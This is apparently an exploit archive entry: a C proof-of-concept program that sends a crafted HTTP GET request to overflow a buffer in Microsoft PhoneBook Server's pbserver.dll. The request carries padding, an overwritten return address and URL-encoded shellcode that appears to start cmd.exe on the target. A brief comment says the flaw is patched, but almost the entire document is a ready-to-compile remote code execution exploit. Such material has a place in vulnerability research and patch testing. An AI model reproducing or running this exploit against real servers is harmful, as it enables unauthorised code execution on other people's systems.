Microsoft Phonebook Server Remote Exploit - Tests for the pbserver.dll buffer overflow.
03ee0782ae94986d7ad6091fa2a68ecd086f76e481828a70e1bbf11319bdf425
/* A vulnerability in the PhoneBook service (a Windows NT and Windows 2000 add on component) enables attackers to execute
arbitrary code on Windows servers. We already discussed this security hole and its possible solution in details in our
previous post: Vulnerability found in Microsoft PhoneBook Server (Patch available). An exploit code has now been
released that serves as a proof of concept for this security vulnerability. */
#include <windows.h>
#include <winsock.h>
#include <string.h>
#include <stdio.h>
struct sockaddr_in sa;
struct hostent *he;
SOCKET sock;
char hostname[256]="";
int main(int argc, char *argv[])
{
int chk=0;
if(argc !=3)
{
printf("Usage: c:\\>%s host port\nTests for the pbserver.dll buffer overrun in IIS\nDavid Litchfield (dlitchfield@atstake.com)",argv[0]);
return 0;
}
strncpy(hostname,argv[1],250);
chk = startWSOCK(hostname);
if(chk !=0)
{
printf("Winsock error");
return 0;
}
CheckWeb(atoi(argv[2]));
return 0;
}
int startWSOCK(char *swhost)
{
int err=0;
WORD wVersionRequested;
WSADATA wsaData;
wVersionRequested = MAKEWORD( 2, 0 );
err = WSAStartup( wVersionRequested, &wsaData );
if ( err != 0 )
{
return 2;
}
if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion )
!= 0 )
{
WSACleanup( );
return 3;
}
if ((he = gethostbyname(swhost)) == NULL)
{
return 4;
}
sa.sin_addr.s_addr=INADDR_ANY;
sa.sin_family=AF_INET;
memcpy(&sa.sin_addr,he->h_addr,he->h_length);
return 0;
}
int CheckWeb(int port)
{
int snd, rcv, err, count =0,incount = 0;
/* the following line may wrap */
char *buffer="GET /pbserver/pbserver.dll?OSArch=0&OSType=2&LCID=\
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE\
&OSVer=%55%8B%EC%90%90%90%90%90%bb%ff%ff%ff%ff%83\
%eb%8b%53%68%6e%2e%74%78%68%76%6f%72%75%68%20\
%70%73%72%68%69%72%20%3e%68%2f%63%20%64%90%90\
&CMVer=%68%65%78%65%20%68%63%6d%64%2e\
%B8%86%a9%f1%77%8b%dc%33%f6%56%53%ff%d0%90%90\
DDDDDDDDDDDDDDDDDDD&PBVer=&0PB=\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAA%4c%55%93%5e%cc%ccAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAA%e4%51%93%5ennnn HTTP/1.1\r\n\
Host: 127.0.0.1\r\n\r\n";
sa.sin_port=htons(port);
sock=socket(AF_INET,SOCK_STREAM,0);
bind(sock,(struct sockaddr *)&sa,sizeof(sa));
if (sock==INVALID_SOCKET)
{
closesocket(sock);
return 0;
}
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) < 0)
{
closesocket(sock);
printf("Failed to connect\n");
return 0;
}
else
{
snd = send(sock,buffer,strlen(buffer),0);
printf("Buffer sent.\n");
}
closesocket(sock);
return 0;
}